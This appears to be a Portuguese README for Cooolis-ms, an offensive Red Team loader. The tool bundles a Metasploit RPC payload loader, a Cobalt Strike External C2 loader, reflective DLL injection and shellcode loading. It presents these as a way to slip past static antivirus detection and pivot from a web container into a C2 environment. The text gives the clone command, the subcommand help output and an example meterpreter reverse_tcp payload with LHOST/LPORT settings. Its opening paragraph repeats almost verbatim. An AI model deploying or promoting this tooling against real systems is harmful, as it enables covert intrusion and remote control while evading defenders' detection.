
Cooolis-ms é uma ferramenta de execução de código que inclui Metasploit Payload Loader, Cobalt Strike External C2 Loader e Reflective DLL injection. Seu objetivo é evitar, durante a verificação estática, alguns códigos que pretendemos executar e que contêm assinaturas, ajudando as equipes de Red Team a fazer a transição de forma mais rápida e conveniente de um ambiente de contêiner Web para um ambiente C2 para continuar o trabalho.

Cooolis-ms é uma ferramenta de execução de código que inclui um Metasploit Payload Loader, um Cobalt Strike External C2 Loader e injeção de DLL reflexiva. Sua função é contornar algumas detecções estáticas em códigos que pretendemos executar e que possuem características conhecidas, ajudando equipes de operações ofensivas a migrar de forma mais rápida e conveniente de um ambiente de contêiner web para um ambiente C2 para continuar o trabalho.
git clone https://github.com/Rvn0xsy/Cooolis-msCooolis-ms baseou-se na documentação da API do Metasploit para implementar a funcionalidade de cliente do serviço RPC, permitindo que o servidor do Cooolis-ms possa enviar qualquer carga útil, aumentando sua flexibilidade.Cooolis-ms baseou-se no MemoryModule para implementar o carregamento de PE, reduzindo as características de execução e a probabilidade de detecção.Cooolis-ms baseou-se no ReflectiveDLLInjection para implementar o carregamento, execução e injeção reflexiva de DLL, reduzindo as características de execução e a probabilidade de detecção.Cooolis-ms baseou-se no External C2 (Third-party Command and Control) para implementar a execução básica de External C2, reduzindo as características de execução e a probabilidade de detecção.Cooolis-ms também considera usar arquivos do servidor Aliyun OSS como código de execução, carregando-os automaticamente na memória, aumentando sua flexibilidade.Atualmente, Cooolis-ms possui os seguintes subcomandos:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe -h
Version v1.2.6
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe [OPTIONS] SUBCOMMAND
Options:
-h,--help Print this help message and exit
Subcommands:
metasploit Metasploit RPC Loader
cobaltstrike Cobalt Strike External C2 Loader
reflective Reflective DLL injection
shellcode Shellcode Loader
Adicione -h/--help após o subcomando para obter os parâmetros detalhados correspondentes:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe metasploit -h
Metasploit RPC Loader
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe metasploit [OPTIONS]
Options:
-h,--help Print this help message and exit
-p,--payload TEXT=windows/meterpreter/reverse_tcp
Payload Name, e.g. windows/meterpreter/reverse_tcp
-o,--options TEXT Payload options, e.g. LHOST=1.1.1.1,LPORT=8866
-P,--PORT UINT:INT in [1 - 65535]=8899 REQUIRED
RPC Server Port
-H,--HOST TEXT:IPV4 REQUIRED
RPC Server Host
Você pode consultar aqui para criar seus próprios projetos interessantes:
Se você achar este projeto interessante, por favor, me dê uma estrela!